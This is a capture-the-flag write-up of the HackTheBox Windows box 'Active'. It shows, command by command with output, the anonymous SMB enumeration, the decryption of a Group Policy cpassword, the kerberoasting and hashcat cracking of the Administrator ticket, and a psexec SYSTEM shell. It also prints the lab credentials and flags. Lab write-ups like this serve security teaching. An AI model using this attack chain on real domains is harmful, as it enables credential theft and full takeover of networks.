August
4th,
2020
This is an easy windows box
Tools used
- cat
- crackmapexec
- getuserspns
- gpp-decrypt
- hashcat
- mkdir
- mount
- nmap
- ntpdate
- psexex
- smbclient
- smbmap
Reconnaissance
Nmap
nmap -sC -sV -oA active 10.10.10.100 -v
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-02 08:07:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-08-02T08:07:58
|_ start_date: 2020-08-02T08:05:58
Here’s what nmap teaches us :
- port 53 (DNS) - Microsoft DNS 6.1.760 - Windows Server 2008 R2 SP1
- port 88 (KERBEROS)
- port 139 (NETBIOS)
- port 389 (LDAP) - Domain: active.htb
- port 445 (SMB)
Nmap gives me the domain name, go add it to /etc/hots :
10.10.10.100 active.htb
Let’s first play with the SMB port :
smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
I have “READ ONLY” access to the “Replication” share, go connect to it :
smbclient //10.10.10.100/Replication
Enter WORKGROUP\liodeus's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
active.htb D 0 Sat Jul 21 12:37:44 2018
10459647 blocks of size 4096. 4922511 blocks available
Download everything :
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (3.1 KiloBytes/sec) (average 1.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.5 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (7.4 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (10.4 KiloBytes/sec) (average 3.3 KiloBytes/sec)
The one file I’m interested in, is the Groups.xml as it may contains encrypted passwords :
cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Nice, I now have a username and an encrypted password. There is a tool called gpp-decrypt, who let you decrypt it :
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
So I now have credentials :
username = SVC_TGS
password = GPPstillStandingStrong2k18
I used different tools to show more possibilities, here with crackmapexec enumerate how to enumerate the shares :
crackmapexec smb 10.10.10.100 -u "SVC_TGS" -p GPPstillStandingStrong2k18 --shares
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
With this account I have “READ” access to more shares.
Exploit
The share I’m interested by is “Users”. I’ll mount it, first create a directory :
mkdir /tmp/Users
Then mount the share in this directory :
sudo mount -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' -t cifs //10.10.10.100/Users /tmp/Users
I can now go see what’s in there :
➜ /tmp ls Users
Administrator 'All Users' Default 'Default User' desktop.ini Public SVC_TGS
➜ /tmp ls Users/SVC_TGS
Contacts Desktop Downloads Favorites Links 'My Documents' 'My Music' 'My Pictures' 'My Videos' 'Saved Games' Searches
➜ /tmp ls Users/SVC_TGS/Desktop/
user.txt
On the desktop there is the user flag. I didn’t found anything interesting in the share and I can’t get a shell because I don’t have write access. I need to think of something else, I have valid credentials and port 88 (KERBEROS) is open. I can try an attack called kerberoasting :
GetUserSPNs.py -dc-ip 10.10.10.100 -request active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2018-07-30 19:17:40.656520
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
I need to synchronize the clock with the box
sudo ntpdate active.htb
3 Aug 13:51:48 ntpdate[45120]: step time server 10.10.10.100 offset +421.660606 sec
Re-run
GetUserSPNs.py -dc-ip 10.10.10.100 -request active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2018-07-30 19:17:40.656520
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$962a7c86f5709dbf9433c5e8c445a498$7dbea8c03963e835ad7138297eba50f0e5912b79f618401a013906a591792e3093111827f5122bcb39ea66c052f9897b9db436c897fa1fc5af03ea141e01f36963ae93dc39254b05d7dee5e31febeaf618bb72796619a79a8cccfe1bdfd94a3460a7d6f0e93f446b88d78b7284927fe07d13ea2dd7fa1662f14682de721731fec9614a0b0e1da756602468ce2abde0181af7b2f5339d21a7dba3facd8e4b8c31d3852dcb00306f052612d5904dbfaef69da204e16a5e720985735dff22e080b0ee45127ee060aee042900362651aef09d6b4c827ffb46f1af8afe32ac42251e8fde5b12651254773b4f94ce63f88fe862f442cb2e78c6ff394d99dacaff5858f026167ff34fe51ad810f6382c72729e4cc44183a40d71cea83221c899d41599de4778659524e623e96d554f48f909409dc1ec0b7e5de818473c71596b14bad36ac12532db537b405595e51f87dab07f49033820ef2ea9e276113783b79fa065bebd73ef74dbf27eedeaf8c1f8330fb7e837f1f5d2369360d41cfa0326d003b9319a9ef1462af98b9afd89190dcfceda74c785b3a60402beeb235549e3f794da690e552be6c28d376dee080b960a1d018c75a0e6c008d980df60254076e9106e99bec3cdf7c18a856515423c4acdd41b1ac04f0816cae05909788d4d77d9230fa1855c25f48e3fb965bc34a9f0c3a40f2222730e2eaa396d26cf0c530c26a8bfca8ca6fea3db01588c893f83d2bd6f63a9ad3ff4165c46bec92992b9d668b3f764c6ed7c7c1d351bb789e43869afcd4ad740c7bfe249212a60275581907bc83d721c3d55345d29e7f8deef734c623e1ae2f0ae20150c0cc2e8d1f50cca86a644dd185dfee583dac412eb0c1cab1c9c8d14307f688624085aa0d45fb5c8fdc7ae2ab7bb48475d08642ffff72b7d6c70545574af3fe2c0acc0d5d1effb43a3695cd7d0ee4ec01d560e737f81234742709d4233ce6930cdd7161cd46e038e25bb002bc1b114dcf67477349190a47a54a1fc52ddb65e84ec71f32b278d4c63c40000b21363b132352f306c9076ea56420230ebd7c9dc79f627ed62e54bbf2d7671cce36a986ba566022c43cbbd68a6b58a1464fa86a2180dcac30d21fcccabd44c9c7e9078b187028ac75ce5d49af91726911e813c0bea949624be7ed0953d02f41e005a0075ff52d3caf10d8d6181fd851dd227aee55060f60637c4def7f6c83b891582338a75540a3ebe3fad0dfbeb4ae1686841b63dff8b1550bd2
It gives me a hash that hashcat can understand, so let’s crack it with hashcat :
hashcat.exe -m 13100 hash.txt rockyou.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$962a7c86f5709dbf9433c5e8c445a498$7dbea8c03963e835ad7138297eba50f0e5912b79f618401a013906a591792e3093111827f5122bcb39ea66c052f9897b9db436c897fa1fc5af03ea141e01f36963ae93dc39254b05d7dee5e31febeaf618bb72796619a79a8cccfe1bdfd94a3460a7d6f0e93f446b88d78b7284927fe07d13ea2dd7fa1662f14682de721731fec9614a0b0e1da756602468ce2abde0181af7b2f5339d21a7dba3facd8e4b8c31d3852dcb00306f052612d5904dbfaef69da204e16a5e720985735dff22e080b0ee45127ee060aee042900362651aef09d6b4c827ffb46f1af8afe32ac42251e8fde5b12651254773b4f94ce63f88fe862f442cb2e78c6ff394d99dacaff5858f026167ff34fe51ad810f6382c72729e4cc44183a40d71cea83221c899d41599de4778659524e623e96d554f48f909409dc1ec0b7e5de818473c71596b14bad36ac12532db537b405595e51f87dab07f49033820ef2ea9e276113783b79fa065bebd73ef74dbf27eedeaf8c1f8330fb7e837f1f5d2369360d41cfa0326d003b9319a9ef1462af98b9afd89190dcfceda74c785b3a60402beeb235549e3f794da690e552be6c28d376dee080b960a1d018c75a0e6c008d980df60254076e9106e99bec3cdf7c18a856515423c4acdd41b1ac04f0816cae05909788d4d77d9230fa1855c25f48e3fb965bc34a9f0c3a40f2222730e2eaa396d26cf0c530c26a8bfca8ca6fea3db01588c893f83d2bd6f63a9ad3ff4165c46bec92992b9d668b3f764c6ed7c7c1d351bb789e43869afcd4ad740c7bfe249212a60275581907bc83d721c3d55345d29e7f8deef734c623e1ae2f0ae20150c0cc2e8d1f50cca86a644dd185dfee583dac412eb0c1cab1c9c8d14307f688624085aa0d45fb5c8fdc7ae2ab7bb48475d08642ffff72b7d6c70545574af3fe2c0acc0d5d1effb43a3695cd7d0ee4ec01d560e737f81234742709d4233ce6930cdd7161cd46e038e25bb002bc1b114dcf67477349190a47a54a1fc52ddb65e84ec71f32b278d4c63c40000b21363b132352f306c9076ea56420230ebd7c9dc79f627ed62e54bbf2d7671cce36a986ba566022c43cbbd68a6b58a1464fa86a2180dcac30d21fcccabd44c9c7e9078b187028ac75ce5d49af91726911e813c0bea949624be7ed0953d02f41e005a0075ff52d3caf10d8d6181fd851dd227aee55060f60637c4def7f6c83b891582338a75540a3ebe3fad0dfbeb4ae1686841b63dff8b1550bd2:Ticketmaster1968
It didn’t took long before hashcat found the password. Let’s now get a shell as the Administrator user :
psexec.py Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file XPONPhQc.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service sqBi on 10.10.10.100.....
[*] Starting service sqBi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
And voila nt authority\system, I can now read the root flag !
Flags
User.txt
cat /tmp/Users/SVC_TGS/Desktop/user.txt
86d67d8ba232bb6a254aa4d10159e983
Root.txt
C:\Users\Administrator\Desktop>type root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b